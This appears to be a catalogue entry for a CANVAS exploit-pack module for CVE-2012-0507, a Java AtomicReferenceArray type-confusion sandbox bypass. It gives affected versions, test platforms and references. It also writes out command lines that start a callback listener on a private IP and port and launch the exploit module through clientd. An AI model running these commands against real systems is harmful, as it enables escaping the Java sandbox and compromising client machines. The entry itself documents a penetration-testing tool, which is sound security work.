Name | java_AtomicReferenceArray |
CVE | CVE-2012-0507 |
Exploit Pack | CANVAS |
Description | Java AtomicReferenceArray Type Confusion Sandbox Bypass |
Notes | CVE Name: CVE-2012-0507 VENDOR: Sun Notes: There is a Type Confusion vulnerability in java.util.concurrent.atomic.AtomicReferenceArray class. When creating a new instance of an AtomicReferenceArray the array type has to be specified, however the AtomicReferenceArray.set method does not properly check the object type being inserted. This vulnerability can then be used together with some reflection tricks to disable the Java Security Manager to escape the sandbox. Affected versions JDK and JRE 7 Update 2 and earlier JDK and JRE 6 Update 30 and earlier JDK and JRE 5.0 Update 33 and earlier SDK and JRE 1.4.2_35 and earlier Tested on: - Windows 7 SP1 with JDK/JRE 7 and 7 update 1 - Windows 7 SP1 with JDK/JRE 6 update 29 - Windows 7 SP1 with JDK/JRE 5 update 22 - Windows XP SP3 with JDK/JRE 7 and 7 update 1 To run from command line, first start the listener (UNIVERSAL): python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17 And then run the exploit from clientd: python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_AtomicReferenceArray -O allowed_recon_modules:js_recon -O auto_detect_exploits:0 Repeatability: Infinite (client side - no crash) References: http://weblog.ikvm.net/CommentView.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3 http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html Date public: 02/14/2012 |
Learn more about the CANVAS Exploit Pack here: CANVAS |